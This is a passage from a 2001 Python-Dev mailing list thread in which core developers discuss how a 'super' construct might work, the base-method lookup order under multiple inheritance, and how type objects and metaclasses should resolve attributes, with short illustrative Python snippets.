<200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> Message-ID: <20010502085741.B515@gerg.ca> On 02 May 2001, Guido van Rossum said: > Yes, I can see how to write super() using current tools (or 1.5.2 > even). The problem is that this makes super calls even more wordy > than they already are! I can't think of anything that wouldn't > require compiler support though. I was just doing some gedanken with various ways to spell "super", and I think my favourite is the same as Java's (as I remember it): class MyClass (BaseClass): def foo (self, arg1, arg2): super.foo(arg1, arg2) Since I don't know much about Python's guts, I can't say how implementable this is, but I like the spelling. The semantics would be something like this (with adjustments to the reality of Python's guts): * 'super' is a magic object that only makes sense inside a 'def' inside a 'class' (at least for now; perhaps it could be generalized to work at class scope as well as method scope, but let's keep it simple) * super's notional __getattr__() does something like this: - peek at the calling stack frame and fetch the calling function (MyClass.foo) and the first argument to that function (self) - [is this possible?] ensure that calling_function is a bound method, and that it's bound to the self object we just plucked from the stack; raise a "misuse of super object" exception if not - walk the superclass tree starting at self.__class__.__bases__ (ie. skip self's class), looking for an object with the name passed to this __getattr__() call -- 'foo' - when found, return it - if not found, raise AttributeError The ability to peek at the calling stack frame is essential to this scheme, in order to fetch the "current object" (self) without needing to have it explicitly passed. Is this as bothersome from C as it is from Python? Greg -- Greg Ward - nerd gward at python.net http://starship.python.net/~gward/ In space, no one can hear you fart. From mal at lemburg.com Wed May 2 15:07:27 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 15:07:27 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <3AF0068F.32388C87@lemburg.com> Greg Ward wrote: > > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > ... This doesn't work in Python since Python has multiple inheritence, e.g. super in class A(B,C): def foo(self): super.foo() is ambiguous. I'd rather suggest adding a function for finding the basemethod of a method. This is probably the most common task in this context. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 15:12:40 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 15:12:40 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <049901c0d309$92c515d0$e000a8c0@thomasnotebook> [Greg Ward] > On 02 May 2001, Guido van Rossum said: > > Yes, I can see how to write super() using current tools (or 1.5.2 > > even). The problem is that this makes super calls even more wordy > > than they already are! I can't think of anything that wouldn't > > require compiler support though. > > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) > > > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) > > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not > - walk the superclass tree starting at self.__class__.__bases__ Caareful! The search in the above context must start at MyClass.__bases__ which may not be the same as self.__class__.__bases__. Thomas From guido at digicool.com Wed May 2 16:29:03 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:29:03 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 08:57:41 -0400." <20010502085741.B515@gerg.ca> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> Message-ID: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> [Greg Ward, welcome back!] > I was just doing some gedanken with various ways to spell "super", and I > think my favourite is the same as Java's (as I remember it): > > class MyClass (BaseClass): > def foo (self, arg1, arg2): > super.foo(arg1, arg2) I'm sure that's everybody's favorite way to spell it! It's mine too. :-) > Since I don't know much about Python's guts, I can't say how > implementable this is, but I like the spelling. The semantics would be > something like this (with adjustments to the reality of Python's guts): > > * 'super' is a magic object that only makes sense inside a 'def' > inside a 'class' (at least for now; perhaps it could be generalized > to work at class scope as well as method scope, but let's keep > it simple) Yes, that's about the only way it can be made to work. The compiler will have to (1) detect that 'super' is a free variable, and (2) make it a local and initialize it with the proper magic. Or, to relieve the burden from the symbol table, we could make super a keyword, at the cost of breaking existing code. I don't think super is needed outside methods. > * super's notional __getattr__() does something like this: > - peek at the calling stack frame and fetch the calling function > (MyClass.foo) and the first argument to that function (self) > - [is this possible?] ensure that calling_function is a bound > method, and that it's bound to the self object we just plucked > from the stack; raise a "misuse of super object" exception if not I don't think you can make that test, but making it a 'magic local' as I suggested above would avoid the problem. > - walk the superclass tree starting at self.__class__.__bases__ > (ie. skip self's class), looking for an object with the name > passed to this __getattr__() call -- 'foo' > - when found, return it > - if not found, raise AttributeError Yup, that's the easy part. :-) > The ability to peek at the calling stack frame is essential to this > scheme, in order to fetch the "current object" (self) without needing to > have it explicitly passed. Is this as bothersome from C as it is from > Python? No, in C it's easy. The problem is that there is no information in the frame that tells you where the currently executing function was defined -- all you have is the code object, which is context-independent. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 16:30:20 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 09:30:20 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 15:07:27 +0200." <3AF0068F.32388C87@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> Message-ID: <200105021430.JAA32075@cj20424-a.reston1.va.home.com> > This doesn't work in Python since Python has multiple inheritence, > e.g. super in > > class A(B,C): > def foo(self): > super.foo() > > is ambiguous. I'm not sure what you mean. The search is totally well-defined: first search B for a foo method, then search C. > I'd rather suggest adding a function for finding the basemethod > of a method. This is probably the most common task in this context. I've never heard of the concept of basemethod, but if I may venture a guess, it would be the same definition as I give above. --Guido van Rossum (home page: http://www.python.org/~guido/) From jeremy at digicool.com Wed May 2 15:38:42 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Wed, 2 May 2001 09:38:42 -0400 (EDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021429.JAA32055@cj20424-a.reston1.va.home.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <15088.3554.953359.757584@slothrop.digicool.com> >>>>> "GvR" == Guido van Rossum writes: >> Since I don't know much about Python's guts, I can't say how >> implementable this is, but I like the spelling. The semantics >> would be something like this (with adjustments to the reality of >> Python's guts): >> >> * 'super' is a magic object that only makes sense inside a 'def' >> inside a 'class' (at least for now; perhaps it could be >> generalized to work at class scope as well as method scope, but >> let's keep it simple) GvR> Yes, that's about the only way it can be made to work. The GvR> compiler will have to (1) detect that 'super' is a free GvR> variable, and (2) make it a local and initialize it with the GvR> proper magic. Or, to relieve the burden from the symbol table, GvR> we could make super a keyword, at the cost of breaking existing GvR> code. GvR> I don't think super is needed outside methods. It seems helpful to clarify here, since this came up in conversation at PythonLabs just the other day with the yield statement. If we try to avoid keywords, we have to take the "well, I don't see anyone assigning to this name" route. If the compiler does not detect any assignment to a nearly reserved word, like super, it would give the use of that word special meaning. There are a bunch of little problems. A module could (not necessarily should) be designed to have a global name poked into its namespace; this would break, because the name would already have transmogrified from a regular variable into a special one. The use of exec or import star would make it impossible for the word to take on its special meaning. So keywords really are a lot clearer, but they have the potential to be incompatible. Jeremy From fredrik at pythonware.com Wed May 2 16:00:55 2001 From: fredrik at pythonware.com (Fredrik Lundh) Date: Wed, 2 May 2001 16:00:55 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <000d01c0d310$4ee127d0$0900a8c0@spiff> guido wrote: > > class MyClass (BaseClass): > > def foo (self, arg1, arg2): > > super.foo(arg1, arg2) > > I'm sure that's everybody's favorite way to spell it! not mine. my brain contains far too much Python 1.5.2 code for it to accept that some variables are dynamically scoped, while others are lexically scoped. why not spell it out: self.__super__.foo(arg1, arg2) or self.super.foo(arg1, arg2) or super(self).foo(arg1, arg2) > Or, to relieve the burden from the symbol table, we could make super > a keyword, at the cost of breaking existing code. hey, how about introducing $ as a keyword prefix for newly introduced keywords? $super.foo(arg1, arg2) (this can of course be mapped to either of my previous suggestions; "$foo" either means "self.foo" or "foo(self)"...) and to save a little typing, only use it for keywords that start with an "s" (should leave us plenty of expansion room): $uper.foo(arg1, arg2) otoh, if "super" is common enough to motivate introducing magic objects into python, maybe "$" should mean "super."? $foo(arg1, arg2) and while we're at it, let's introduce "@" for "self.". gotta run -- time for my monthly reboot /F From guido at digicool.com Wed May 2 17:03:37 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:03:37 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 11:09:17 +0200." <3AEFCEBD.2E5979C9@lemburg.com> References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105021503.KAA32203@cj20424-a.reston1.va.home.com> [me] > > The best rule I can think of so far is that DictType.__dict__ gives > > the *true* set of attribute descriptors for dictionary objects, and is > > thus similar to Smalltalks's class.methodDict that Jim describes > > below. DictType.foo is a shortcut that can resolve to either > > DictType.__dict__['foo'] or to an attribute (maybe a method) of > > DictType described in TypeType.__dict__['foo'], whichever is defined. > > If both are defined, I propose the following, clumsy but backwards > > compatible rule: if DictType.__dict__['foo'] describes a method, it > > wins. Otherwise, TypeType.__dict__['foo'] wins. [MAL] > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that both a dictionary object (call it d) and its type (DictType) have a __repr__ method: repr(d) returns "d", and repr(DictType) returns "". Given the analogy with classes, where str(x) invokes x.__str__() and x.__str__() can also be called directly, it is not unreasonable to expect that this works in general, so that repr(d) can be spelled as d.__repr__() and repr(DictType) as DictType.__repr__() And, given another analogy with classes, where x.foo() is equivalent to x.__class__.foo(x), the two forms above should also be equivalent to d.__class__.__repr__(d) and DictType.__class__.__repr__(DictType) But since d.__class__ is DictType, we now have two conflicting ways to derive a meaning for DictType.__repr__: the first one going repr(DictType) => DictType.__repr__() and the second one going repr(d) => d.__class__.__repr__(d) => DictType.__repr__(d) The rule quoted above chooses the second meaning, from the very pragmatic point that once I allow subclassing from DictType, such a subclass might very well want to override __repr__ to wrap the base class __repr__, and the conventional way to reference that (barring the implementation of 'super') is DictType.__repr__. Direct invocation of an object's own __repr__ method as x.__repr__() is much les common. The implementation of repr(x) can do the right thing, which is to look for x.__class__.__dict__['__repr__']. > The problem with the misleading error message would only show > up in case DictType does not define a __repr__ method. Then the > inherited one from TypeType would come into play and cause > the problem you mention above. No, the issue is not inheritance: I haven't implemented inheritance yet. DictType is an instance of TypeType but doesn't inherit from it. > Thinking in terms of meta-classes, I believe we should implement > this mechanism in the meta-class (TypeType in this case). Its > __getattr__() will have to decide whether or not to expose its > own methods and attributes or not. That's exactly how I solved it: type_getattro() implements the rule quoted at the top. > The only catch here is that currently instances and classes have > control of whether and how to bind found functions as methods or not. > We should probably change that to pass complete control over to the > meta-class object and remove the special control flows currently found > in instance_getattr2() and class_lookup(). Um, yeah, that's where I think this will end up causing more trouble. Right now, if x is an instance, some attributes like x.__class__ and x.__dict__ special-cased in instance_getattr(). The mechanism I propose removes the need for (most of) such special cases, and instead allows the class to provide "descriptors" for instance attributes. So, for example, if instances of a class C have an attribute named foo, C.__dict__['foo'] contains the descriptor for that attribute, and that is how the implementation decides how to interpret x.foo (assuming x is an instance of C). We may be able to access this same descriptor as C.foo, but that's really only important for backwards compatibility with the way classes work today. > In general, I think that meta-classes should not expose their > attributes to the class objects they create, since this causes > way to many problems. I agree. > Perhaps I'm oversimplifying things here, but I have a feeling that > we can go a long way by actually trying to see meta-classes as > first class members in the interpreter design and moving all the > binding and lookup mechanisms over to this object type. The special > casing should then take place in the meta-class rather than its > creations. Yes, that's where I'm heading! --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:02:41 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:02:41 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF01381.592AE31B@lemburg.com> Guido van Rossum wrote: > > > This doesn't work in Python since Python has multiple inheritence, > > e.g. super in > > > > class A(B,C): > > def foo(self): > > super.foo() > > > > is ambiguous. > > I'm not sure what you mean. The search is totally well-defined: first > search B for a foo method, then search C. I thought you were talking about an abstract super class which is how Java uses this term. Rereading some of the posts, I think you are indeed referring to the method which foo overrides -- this is what I call basemethod (since it is implemented in one of the base classes). > > I'd rather suggest adding a function for finding the basemethod > > of a method. This is probably the most common task in this context. > > I've never heard of the concept of basemethod, but if I may venture a > guess, it would be the same definition as I give above. The basemethod can be defined as the first method of the same name found in the inheritence tree using the standard Python lookup strategy (left-right, depth first) when continuing the lookup search at the node in the inheritence tree which defines the method querying the basemethod. In other words: you let Python continue the search for the method as if it hadn't found the occurrance calling the bsaemethod() API. Hmm, still not clear enough... better let Tim jump in here (we've had a discussion about basemethod() some months or years ago). Tim ? Note that there are many ways of defining what a basemethod is, due to the ambiguities that are caused by multiple inheritence (e.g. the same base class may appear in different branches of the inheritence tree). -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido at digicool.com Wed May 2 17:05:30 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:05:30 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:00:55 +0200." <000d01c0d310$4ee127d0$0900a8c0@spiff> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <200105021505.KAA32231@cj20424-a.reston1.va.home.com> > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) > > > Or, to relieve the burden from the symbol table, we could make super > > a keyword, at the cost of breaking existing code. > > hey, how about introducing $ as a keyword prefix for newly introduced > keywords? > > $super.foo(arg1, arg2) > > (this can of course be mapped to either of my previous suggestions; > "$foo" either means "self.foo" or "foo(self)"...) > > and to save a little typing, only use it for keywords that start with > an "s" (should leave us plenty of expansion room): > > $uper.foo(arg1, arg2) > > otoh, if "super" is common enough to motivate introducing magic objects > into python, maybe "$" should mean "super."? > > $foo(arg1, arg2) > > and while we're at it, let's introduce "@" for "self.". > > gotta run -- time for my monthly reboot /F LOL! But you forgot the spelling of self.__super.foo(arg1, arg2) which would pass in the class name that's the other necessary input to a proper implementation of super. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:04:29 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:04:29 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> Message-ID: <3AF013ED.8A190FE2@lemburg.com> Here's an implementation of what I currently use to track down the basemethod (taken from mx.Tools): import types _basemethod_cache = {} def basemethod(object,method=None, cache=_basemethod_cache,InstanceType=types.InstanceType, ClassType=types.ClassType,None=None): """ Return the unbound method that is defined *after* method in the inheritance order of object with the same name as method (usually called base method or overridden method). object can be an instance, class or bound method. method, if given, may be a bound or unbound method. If it is not given, object must be bound method. Note: Unbound methods must be called with an instance as first argument. The function uses a cache to speed up processing. Changes done to the class structure after the first hit will not be noticed by the function. XXX Rewrite in C to increase performance. """ if method is None: method = object object = method.im_self defclass = method.im_class name = method.__name__ if type(object) is InstanceType: objclass = object.__class__ elif type(object) is ClassType: objclass = object else: objclass = object.im_class # Check cache cacheentry = (defclass, name) basemethod = cache.get(cacheentry, None) if basemethod is not None: if not issubclass(objclass, basemethod.im_class): if __debug__: sys.stderr.write( 'basemethod(%s, %s): cached version (%s) mismatch: ' '%s !-> %s\n' % (object, method, basemethod, objclass, basemethod.im_class)) else: return basemethod # Find defining class path = [objclass] while 1: if not path: raise AttributeError,method c = path[0] del path[0] if c.__bases__: # Prepend bases of the class path[0:0] = list(c.__bases__) if c is defclass: # Found (first occurance of) defining class in inheritance # graph break # Scan rest of path for the next occurance of a method with the # same name while 1: if not path: raise AttributeError,name c = path[0] basemethod = getattr(c, name, None) if basemethod is not None: # Found; store in cache and return cache[cacheentry] = basemethod return basemethod del path[0] raise AttributeError,'method %s' % name -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From thomas.heller at ion-tof.com Wed May 2 16:06:39 2001 From: thomas.heller at ion-tof.com (Thomas Heller) Date: Wed, 2 May 2001 16:06:39 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> Message-ID: <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> /F: > guido wrote: > > > > class MyClass (BaseClass): > > > def foo (self, arg1, arg2): > > > super.foo(arg1, arg2) > > > > I'm sure that's everybody's favorite way to spell it! > > not mine. my brain contains far too much Python 1.5.2 code > for it to accept that some variables are dynamically scoped, > while others are lexically scoped. > > why not spell it out: > > self.__super__.foo(arg1, arg2) > > or > > self.super.foo(arg1, arg2) > > or > > super(self).foo(arg1, arg2) IMO we still need to specify the class, and there we are: super(self, MyClass).foo(arg1, arg2) Thomas From guido at digicool.com Wed May 2 17:11:17 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:11:17 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:02:41 +0200." <3AF01381.592AE31B@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF01381.592AE31B@lemburg.com> Message-ID: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> > Guido van Rossum wrote: > > > > > This doesn't work in Python since Python has multiple inheritence, > > > e.g. super in > > > > > > class A(B,C): > > > def foo(self): > > > super.foo() > > > > > > is ambiguous. > > > > I'm not sure what you mean. The search is totally well-defined: first > > search B for a foo method, then search C. > > I thought you were talking about an abstract super class which is > how Java uses this term. Ah. I didn't realize. This would suggest that another (not yet mentioned) suggestion would be to spell the basemethod call as super.foo(self) keeping more in line with the tradition of passing self explicitly when calling basemethods. > Rereading some of the posts, I think you are indeed referring to > the method which foo overrides -- this is what I call basemethod > (since it is implemented in one of the base classes). Aha. > > > I'd rather suggest adding a function for finding the basemethod > > > of a method. This is probably the most common task in this context. > > > > I've never heard of the concept of basemethod, but if I may venture a > > guess, it would be the same definition as I give above. > > The basemethod can be defined as the first method of the same name > found in the inheritence tree using the standard Python lookup > strategy (left-right, depth first) when continuing the lookup search > at the node in the inheritence tree which defines the method querying > the basemethod. Yes, that's what I guessed. > In other words: you let Python continue the search for the method > as if it hadn't found the occurrance calling the basemethod() > API. Hmm, still not clear enough... better let Tim jump in here > (we've had a discussion about basemethod() some months or years > ago). Tim ? > > Note that there are many ways of defining what a basemethod > is, due to the ambiguities that are caused by multiple inheritence > (e.g. the same base class may appear in different branches of the > inheritence tree). Well, the search will find one definite method, but you're right that there may be situations where it's necessary to specify the specific base class! In C++ that is solved by writing B::foo() or C::foo(). Python doesn't have "::" and instead overloads the "." operator. Hmm, so even introducing super doesn't completely remove the need to be able to write C.foo to reference the unbound method foo of class C, and this may require that my ugly rule still be needed. AFAIK, Smalltalk has only single inheritance, and so does Java, so there 'super' is enough. Will we need to add a "::" operator to Python??? --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:19:07 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:19:07 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 16:04:29 +0200." <3AF013ED.8A190FE2@lemburg.com> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> Message-ID: <200105021519.KAA32312@cj20424-a.reston1.va.home.com> > Here's an implementation of what I currently use to track down > the basemethod (taken from mx.Tools): How am I supposed to use this? I tried this: class B: def foo(self): print "B.foo" class C(B): def foo(self): print "C.foo" B.foo(self) print basemethod(self.foo) # Expect this to be B.foo class D(C): def foo(self): print "D.foo" C.foo(self) d = D() d.foo() but the call to basemethod(self.foo) in C prints C.foo, not B.foo as required. --Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Wed May 2 17:23:33 2001 From: guido at digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 10:23:33 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 14:48:20 +1200." <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> References: <200105020248.OAA16329@s454.cosc.canterbury.ac.nz> Message-ID: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> > > Except that sometimes you really do want x.__class__.__classdict__ to > > have priority (e.g. for "guarded" attributes). > > What's a "guarded" attribute? I meant an attribute that's implemented by a pair of get and set functions. This is very useful; my proposed design lets you define this more directly rather than requiring you to override __getattr__ and __setattr__. > > But the issue of backwards compatibility is a big one here > > I was thinking that, while this is still in the __future__, > the __dict__ attribute would be a pseudo-dict that, by > default, behaves like the union of the old __dict__ and > the __classdict__. Actually, I think that what's in the __dict__ is just perfect; it's the definition of getattr(classobject, name) where name is both an instance and a class method that causes trouble. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal at lemburg.com Wed May 2 16:29:20 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 16:29:20 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <3AF0068F.32388C87@lemburg.com> <200105021430.JAA32075@cj20424-a.reston1.va.home.com> <3AF013ED.8A190FE2@lemburg.com> <200105021519.KAA32312@cj20424-a.reston1.va.home.com> Message-ID: <3AF019C0.716E6D35@lemburg.com> Guido van Rossum wrote: > > > Here's an implementation of what I currently use to track down > > the basemethod (taken from mx.Tools): > > How am I supposed to use this? > > I tried this: > > class B: > def foo(self): > print "B.foo" > > class C(B): > def foo(self): > print "C.foo" > B.foo(self) > print basemethod(self.foo) # Expect this to be B.foo This finds the basemethod of self.foo meaning the method overridden by D.foo. To get at the basemethod of C.foo, you'd have to call basemethod(self, C.foo) Note that the intent here is to be able to call basemethods even in case the defining class is only mixin class -- a very common situation at least in many of my applications (keeps inheritance trees shallow and increases readability of the code). > class D(C): > def foo(self): > print "D.foo" > C.foo(self) > > d = D() > d.foo() > > but the call to basemethod(self.foo) in C prints C.foo, not B.foo as > required. > > --Guido van Rossum (home page: http://www.python.org/~guido/) > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > http://mail.python.org/mailman/listinfo/python-dev -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From fredrik at effbot.org Wed May 2 16:15:58 2001 From: fredrik at effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 16:15:58 +0200 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> Message-ID: <002c01c0d312$6a195110$e46940d5@hagrid> thomas wrote: > > why not spell it out: > > > > self.__super__.foo(arg1, arg2) > > > > or > > > > self.super.foo(arg1, arg2) > > > > or > > > > super(self).foo(arg1, arg2) > > IMO we still need to specify the class, and there we are: > > super(self, MyClass).foo(arg1, arg2) isn't that the same as self.__class__ ? in which case super is something like: import new class super: def __init__(self, instance): self.instance = instance def __getattr__(self, name): for klass in self.instance.__class__.__bases__: member = getattr(klass, name, None) if member: if callable(member): return new.instancemethod(member, self.instance, klass) return member raise AttributeError(name) (I'm even more confused than my pythonware.com colleague) Cheers /F From donb at abinitio.com Wed May 2 16:41:14 2001 From: donb at abinitio.com (Donald Beaudry) Date: Wed, 02 May 2001 10:41:14 -0400 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> Message-ID: <200105021441.KAA08444@localhost.localdomain> Guido van Rossum wrote, > [Greg Ward, welcome back!] > > * 'super' is a magic object that only makes sense inside a 'def' > > inside a 'class' (at 